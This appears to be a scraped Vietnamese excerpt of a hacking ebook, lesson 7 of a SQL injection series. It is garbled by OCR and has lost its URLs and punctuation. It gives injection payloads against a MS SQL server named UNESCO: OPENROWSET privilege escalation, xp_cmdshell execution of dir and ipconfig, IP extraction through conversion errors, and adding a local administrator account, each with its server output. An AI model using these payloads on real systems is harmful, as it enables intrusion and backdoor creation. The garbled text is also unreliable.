Tham khảo tài liệu 'hacker professional ebook part 234', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | allow updates 1 reconfigure with override . The OLE DB provider sqloledb indicates that the object has no columns. Including line 840 THÊM DÒNG SELECT 1 ĐỂ KHẮC PHỤC LỖI http id 1 select from openrowset sqloledb server UNESCO uid BUILTIN Administrators pwd set fmtonly off select 1 exec xp_cmd exec sp_configure allow updates 1 reconfigure with override -- set allow updates 1 cho phép update các sỵstem-table sỵsusers sỵslogins . trực tiếp không qua các system-procedure CHÚ Ý KHI CHẠY exec dir c -- SQLAgentCmdExec select from openrowset sqloledb server SERVER_NAME uid BUILTIN Administrators p wd set fmtonlỵ off select 1 exec dir c -- NT AUTHORITY SYSTEM fantomas311 VNISS Tổng hợp về SQL Injection bài 7 XÁC ĐỊNH IP CỦA SERVER http id 1 drop table t create table t a int identitỵ b varchar 1000 insert into t exec ipconfig --http id 1 and 1 convert int select top 1 b from t where b like 25IP Address 25 -- 25 Microsoft OLE DB Provider for ODBC Drivers error 80040e07 Microsoft ODBC SQL Server Driver SQL Server Sỵntax error converting the varchar value IP Address. to a column of data tỵpe int. Including line 840 DO THÁM IP C ping Pinging with 32 bytes of data Reply from bytes 32 time 232ms TTL 118 C ftp Connected to . 220 unesco Microsoft FTP Service Version . User FTP TRỰC TIẾP - THẤT BẠI http id 1 select from openrowset sqloledb server UNESCO uid BUILTIN Administrators pwd set fmtonly off select 1 exec xp_cmdshell net user a add 26 net localgroup administrators a add -- 26 C ftp Connected to . 220 unesco Microsoft FTP Service Version . User